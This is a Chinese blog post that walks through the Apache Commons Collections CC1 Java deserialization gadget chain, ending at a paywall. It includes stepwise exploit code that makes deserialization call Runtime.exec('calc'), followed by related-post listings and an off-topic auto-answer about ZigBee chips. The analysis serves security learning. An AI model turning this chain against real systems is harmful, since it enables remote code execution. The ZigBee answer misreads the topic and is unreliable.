Java安全-CC链全分析

原创 已于 2025-03-05 16:19:23 修改 · 置顶 · 2.4k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #安全 #开发语言 #网络

于 2024-11-19 14:02:58 首次发布

前置知识

Java访问权限概述

对于一个类,其成员(包括成员变量和成员方法)能否被其他类所访问,取决于该成员的修饰词。在Java中,类成员的访问权限修饰词有四个:private,无(包访问权限),protected 和 public,其权限控制如下表所示:

同一个类中 同一个包中 不同包的子类 不同包的无关类
public
protected
无(空着不写)
private

不同包中子类: 不同包通过继承获得关系
不同包中的无关类: 不同包通过直接创建对象来获得关系

反射

Java反射操作的是java.lang.Class对象,所以我们需要要先获取到Class对象。

获取Class对象的方式:

1. Class.forName("全类名"):将字节码文件加载进内存,返回Class对象
         多用于配置文件,将类名定义在配置文件中。读取文件,加载类
2. 类名.class:通过类名的属性class获取
         多用于参数的传递
3. 对象.getClass():getClass()方法在Object类中定义着。
         多用于对象的获取字节码的方式

代码实例:

方式一:
        Class cls1 = Class.forName("Domain.Person");
        System.out.println(cls1);
方式二:
        Class cls2 = Person.class;
        System.out.println(cls2);
        
方式三:

        Person p = new Person();
        Class cls3 = p.getClass();
        System.out.println(cls3);

环境部署

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>cc分析</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>
    <dependencies>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.1</version>
        </dependency>

        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>
    </dependencies>
</project>

CC1

流程分析

入口:org.apache.commons.collections.Transformer
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

入口类:org.apache.commons.collections.functors.InvokerTransformer,它的transform方法使用了反射来调用input的方法,InvokerTransformer相当于帮我们实现了一个反射调用,并且input,iMethodName,iParamTypes,iArgs都是可控的
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

因此我们可以通过InvokerTransformer类的transform方法来invoke Runtime类getRuntime对象的exec来实现rce

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class cc1 {
   
   
    public static void main(String[] args) {
   
   
        new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "calc"}).transform(Runtime.getRuntime());
    }
}

成功执行命令
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

现在的重点就是去找一个其它的类有transform方法,并且传入的Object是可控的,然后我们只要把这个Object设为InvokeTransformer即可,我们全局搜索transform方法,能够发现很多类都是有transform方法的,我们这里先研究的是CC1,所以我们直接看TransformerMap类
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

在TransformedMap中的checkSetValue方法中调用了transform,valueTransformer是构造的时候赋的值,再看构造函数
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

构造函数是一个protected,所以不能让我们直接实例赋值,只能是类内部构造赋值,找哪里调用了构造函数
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

一个静态方法,这里我们就能控制参数了
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
如果我们可以调用 TransformedMap 的 checkSetValue方法,那我们给 valueTransformer 实例就可以通过valueTransformer.transform(value) 实现 InvokerTransformer.transform(value) 从而 rce

现在调用transform方法的问题解决了,返回去看checkSetValue,可以看到value我们暂时不能控制,全局搜索checkSetValue,看谁调用了它,并且value值可受控制,在AbstractInputCheckedMapDecorator类中发现,凑巧的是,它刚好是TransformedMap的父类
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

在这里假如对Java集合熟悉一点的人看到了setValue字样就应该想起来,我们在遍历集合的时候就用过setValue和getValue,所以我们只要对decorate这个map进行遍历setValue,由于TransformedMap继承了AbstractInputCheckedMapDecorator类,因此当调用setValue时会去父类寻找,写一个demo来测试一下:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class cc1 {
   
   
    public static void main(String[] args) {
   
   
        Runtime r = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "calc"});
        HashMap<Object, Object> map = new HashMap<>();
        map.put("1","2");
        Map<Object, Object> decorate = TransformedMap.decorate(map, null, invokerTransformer);
        for(Map.Entry entry:decorate.entrySet()){
   
   
            entry.setValue(r);
        }
    }
}

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

我们追踪一下setValue看是在哪调用的,在AnnotationInvocationHandler中找到,而且还是在重写的readObject中调用的setValue,这还省去了再去找readObject

    private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
   
   
        s.defaultReadObject();

        // Check to make sure that types have not evolved incompatibly

        AnnotationType annotationType = null;
        try {
   
   
            annotationType = AnnotationType.getInstance(type);
        } catch(IllegalArgumentException e) {
   
   
            // Class is no longer an annotation type; time to punch out
            throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
        }

        Map<String, Class<?>> memberTypes = annotationType.memberTypes();

        // If there are annotation members without values, that
        // situation is handled by the invoke method.
        for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
   
   
            String name = memberValue.getKey();
            Class<?> memberType = memberTypes.get(name);
            if (memberType != null) {
   
     // i.e. member still exists
                Object value = memberValue.getValue();
                if (!(memberType.isInstance(value) ||
                      value instanceof ExceptionProxy)) {
   
   
                    memberValue.setValue(
                        new AnnotationTypeMismatchExceptionProxy(
                            value.getClass() + "[" + value + "]").setMember(
                                annotationType.members().get(name)));
                }
            }
        }
    }

我们分析下AnnotationInvocationHandler这个类,未用public声明,说明只能通过反射调用
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

查看一下构造方法,传入一个Class和Map,其中Class继承了Annotation,也就是需要传入一个注解类进去,这里我们选择Target,之后说为什么
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

构造exp:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
   
   
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
   
   
        Runtime r = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "calc"});
        HashMap<Object, Object> map = new HashMap<>();
        map.put("1","2");
        Map<Object, Object> decorate = TransformedMap.decorate(map, null, invokerTransformer);
//        for(Map.Entry entry:decorate.entrySet()){
   
   
//            entry.setValue(r);
//        }
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        Object o = constructor.newInstance(Target.class, decorate);
    }
}

现在有个难题是Runtime类是不能被序列化的,但是反射来的类是可以被序列化的,还好InvokeTransformer有一个绝佳的反射机制,构造一下:

Method RuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{
   
   String.class,Class[].class},new Object[]{
   
   "getRuntime",null}).transform(Runtime.class);
Runtime r = (Runtime) new InvokerTransformer("invoke", new Class[]{
   
   Object.class, Object[].class}, new Object[]{
   
   null, null}).transform(RuntimeMethod);
InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "calc"});

现在还有个小问题,其中我们的transformedmap是传入了一个invokertransformer,但是现在这个对象没有了,被拆成了多个,就是上述三段代码,得想个办法统合起来,这里就回到最初的Transformer接口里去寻找,找到ChainedTransformer,刚好这个方法是递归调用数组里的transform方法
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

我们就可以这样构造:

Transformer[] transformers = new Transformer[]{
   
   
    new InvokerTransformer("getMethod",new Class[]{
   
   String.class,Class[].class},new Object[]{
   
   "getRuntime",null}),
    new InvokerTransformer("invoke", new Class[]{
   
   Object.class, Object[].class}, new Object[]{
   
   null, null}),
    new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> map = new HashMap<>();
map.put("1","2");
Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);

到这一步雏形以及可以构造出来了

package org.example;

import com.sun.xml.internal.ws.encoding.MtomCodec;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
public class cc1 {
   
   
    public static void serialize(Object obj) throws IOException {
   
   
        FileOutputStream fos = new FileOutputStream("cc1.bin");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(obj);
    }
    public static void deserialize(String filename) throws IOException, ClassNotFoundException {
   
   
        FileInputStream fis = new FileInputStream(filename);
        ObjectInputStream ois = new ObjectInputStream(fis);
        ois.readObject();
    }

    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
   
   
        Transformer[] transformers = new Transformer[]{
   
   
                new InvokerTransformer("getMethod",new Class[]{
   
   String.class,Class[].class},new Object[]{
   
   "getRuntime",null}),
                new InvokerTransformer("invoke", new Class[]{
   
   Object.class, Object[].class}, new Object[]{
   
   null, null}),
                new InvokerTransformer("exec", new Class[]{
   
   String.class}, new Object[]{
   
   "calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("1","2");
        Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        Object o = constructor.newInstance(Target.class, decorate);
        serialize(o);
        deserialize("cc1.bin");
    }
}

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

但是这里反序列化并不能执行命令,why?原因在于AnnotationInvocationHandler里触发setValue是有条件的,我们调试追踪进去看看:
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

要想触发setValue得先过两个if判断,先看第一个if判断,memberType不能为null,memberType其实就是我们之前传入的注解类Target的一个属性,这个属性哪里来的?就是我们最先传入的map map.put(“1”,“2”)
获取这个name:1,获取1这个属性,很明显我们的Target注解类是没有1这个属性的,我们看一下Target类
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Target是有value这个属性的,所以我们改一下map,map.put(“value”, 1),这样就过了第

最低0.47元/天 解锁文章
JavaCC 实战一:安装与入门示例
SmartSi
11-09 1060
Java Compiler Compiler (JavaCC) 是 Java 应用程序最流行的一种解析器生成器。解析器生成器是一种可以读取语法规范并将其转换为能够识别与匹配语法规范的一段 Java 程序。除了解析器生成器本身,JavaCC 还提供了与解析器生成相关的其他功能,例如树构建(通过 JavaCC 附带的 JJTree 工具)、操作和调试。一旦生成 JavaCC 解析器,运行它只需要 Java 运行时环境(JRE)。
Java安全 CC1分析(Lazymap类)
Elite的博客
02-11 2695
本文讲解了Java安全中如何使用LazyMap类来构造cc1,详细易懂,小白首选
Java安全入门(二)——CC1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
Java安全 CC1分析
Elite的博客
01-20 2164
Commons Collections:Java中有一个Collections包,内部封装了许多方法用来对集合进行处理,CommonsCollections则是对Collections进行了补充,完善了更多对集合处理的方法,大大提高了性能。
cc1分析与复现
最新发布
2401_84123533的博客
09-11 1131
摘要: Apache Commons Collections(CC1)利用式Transformer实现反序列化漏洞攻击。通过构建包含ConstantTransformer和InvokerTransformer的Transformer数组,形成反射调用(Runtime.class→getRuntime()→exec()),并借助TransformedMap触发恶意逻辑。核心在于InvokerTransformer.transform()方法通过反射动态执行命令,而ChainedTransformer串联各
Java反序列化之CC解析
defeed的博客
05-11 1650
一篇学习介绍javacc的文章,对cc的transform和简单的利用做了一些介绍
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 4671
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
Java反序列化利用篇 | CC6分析(通用版CC
哦 卷!
09-21 1692
构造方法的第二个参数用不到,所以随意传入进行,但是重要的是它接受一个Object对象,而这个对象的类需要实现Serializable接口,如果不是,则后续的序列化不能成功。属性设置为空的map对象(除上面创建的lazyMap都行),则最终就不会触发到恶意代码 (当然其他的也行:只要保证整个子到不了恶意代码就行)。方法在反序列化的时候会被调用,因此我们只需要创建一个HashMap对象,然后序列化即可。第2步将map属性设置为一个空的map对象(除上面创建的lazyMap都行)对象中的内容不完整呢?
java-CC1分析
qq_62613905的博客
01-30 578
java-CC分析
关于JavaCC的一些
行风
08-06 2693
(1)官方网址:https://javacc.dev.java.net/(2)JavaCC Grammar Repositoryhttp://cobase-www.cs.ucla.edu/pub/javacc/#Jsection 
cc1分析
Sk1y的博客
04-08 852
cc1分析 文章目录cc1分析jdk版本依赖测试弹计算器用反射去调用Runtime,去弹一个计算器倒序找危险函数InvokerTransformer-->transformerTransformedMapMapEntry入口AnnotationInvocationHandlerRuntime序列化ChainedTransformer类对其简化继续调试 jdk版本 jdk版本:jdk8u65 因为在jdk8u71的时候,已经修复了 下载相应的jdk版本,去下面这个接 https://www.or
java反序列化——CC1
dreamer292的博客
08-27 1725
完整的子追踪起来还是挺复杂的,里面很多地方也都只是浅尝而止,基础还是不牢固反射机制还学的不太明白。 等多看几条子就老实了。。。
JAVA反序列化系列--CC1分析详解
m0_74211871的博客
05-09 2305
本文详细介绍了如何通过Java反序列化漏洞利用Commons Collections库中的TransformerCC1)实现任意命令执行。首先,配置Maven项目并添加commons-collections依赖,准备JDK源码以便调试。接着,分析了InvokerTransformer、ChainedTransformer和ConstantTransformer三个关键类的作用及其在漏洞利用中的角色。通过反射调用Runtime.getRuntime(),绕过类型检查,并构造Transformer
java安全-CC1(小宇特详解)
小宇的web博客
01-29 3118
java安全-CC1(小宇特详解) CC的前提是序列化和反序列化 序列化需要两个条件 该类必须实现java.io.Serlalizable接口 该类的所有属性必须是可序列化的,如果⼀个属性是不可序列化的,则属性必须标明是短暂的。 比如:static,transient 修饰的变量不可被序列化 注意事项: 不能new 一个Runtime类 package com.CC1; public class Demo { public static void main(String[] arg
[JAVA反序列化]Javacc1分析
Y4tacker的博客
06-01 2286
文章目录写在前面动态代理简单介绍动态代理的实现JavaCC1解读参考文章 写在前面 这几天算是好好一边审计PHP的一些CMS一边啃Java的代码,终于能看懂CC1的构造流程了 动态代理 简单介绍 在JavaCC1的构造中,动态代理起了很关键的作用,这里来进行简单介绍,Java标准库提供了动态代理的机制,其可以在运行期动态创建interface的实例,直接从demo来理解 首先我们来个通常写代码的方式 我们先来一个一个接口,本CTF狗来个Flag吧 interface flag { void g
Java反序列化:CC1 详解
Jay17的博客
10-06 3485
Java反序列化:CC1 详解
Java反序列化CC分析
阿道夫的博客
02-06 697
Apache Commons是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。Commons Collections包为Java标准的CollectionsAPI提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2517
Commons Collections 1的基本知识
java CC
2401_88165388的博客
05-09 675
通常指的是 Apache Commons Collections 库中存在的反序列化漏洞的利用**以下源码均来自 commons-collections-3.2.2.jar **该接口专门用于把一个输入对象转换为另一个输出对象。其定义十分简洁,只有一个抽象方法 ConstantTransformer 类 类实现了 接口,其主要功能是创建一个转换器,无论传入什么输入对象,该转换器都会返回一个预先设定的常量值 ConstantTransformer 类有一个私有常量字段 iConstant,在构造函数中
cc
04-28
### 关于CC的技术实现与使用教程 #### CC简介 CC通常指的是基于ZigBee协议栈中的芯片(如TI公司的CC系列芯片,例如CC2530、CC26xx等)所构建的通信网络。这些芯片广泛应用于物联网(IoT)领域,尤其是在低功耗无线传感网中。以下是关于CC的一些关键技术实现和使用方法。 --- #### 技术实现细节 1. **硬件架构** - CC的核心组件通常是TI公司推出的CC系列SoC(System on Chip)。这类芯片集成了射频收发器、微控制器以及多种外设接口[^2]。 -CC2530为例,其内部结构包括8051 MCU核心、ADC/DAC模块、定时器/计数器单元以及其他外围电路。这种设计使得开发者能够在单片机基础上快速搭建完整的嵌入式系统。 2. **软件框架** - 软件部分主要依赖于厂商提供的SDK(Software Development Kit),比如用于ZigBee开发的Z-Stack协议栈或者SimpleLink SDK对于BLE/Zigbee双模产品而言更为适用[^4]。 - Z-Stack提供了从物理层到应用层的一整套解决方案,允许用户专注于特定应用场景下的逻辑编程而无需关心底层复杂机制。 3. **通信协议** - ZigBee遵循IEEE 802.15.4标准定义的数据包格式进行数据传输,在此基础上扩展出了更高层次的功能特性——Mesh组网能力就是其中之一[^2]。 ```c // 示例:发送简单消息至指定节点ID uint8_t payload[] = { 'H', 'e', 'l', 'l', 'o' }; zstack_sendData(DEST_ADDR, payload, sizeof(payload)); ``` 4. **节能策略** - 利用深度睡眠模式配合外部事件触发唤醒机制来降低整体能耗水平是非常重要的设计理念之一[^2]。当没有活跃的任务处理时,MCU会进入省电状态直到下一个预定时间点到来或者是接收到某些特殊信号为止。 --- #### 使用教程概览 为了帮助初学者更好地理解和掌握CC的实际操作流程,下面给出了一般性的指导步骤: 1. **环境搭建** - 下载安装官方推荐版本的IAR Embedded Workbench IDE或者其他兼容工具- 获取最新版对应目标平台的固件库文档资料; 2. **项目创建** - 新建工程文件夹并将初始模板导入其中; - 设置交叉编译参数确保最终产出物适配选定型号处理器架构特点; 3. **功能验证** - 测试基本IO口读写动作确认硬件连接无误之后再逐步增加其他高级特性的实验环节; ```python import serial ser = serial.Serial('COMX', baudrate=9600, timeout=1) while True: data = ser.readline().decode('utf-8').strip() if data != "": print(f"Received: {data}") ``` 4. **深入探索** - 学习更多有关安全加密算法集成方面的知识以便提升整个系统的鲁棒性和抗干扰性能; ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sagice

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值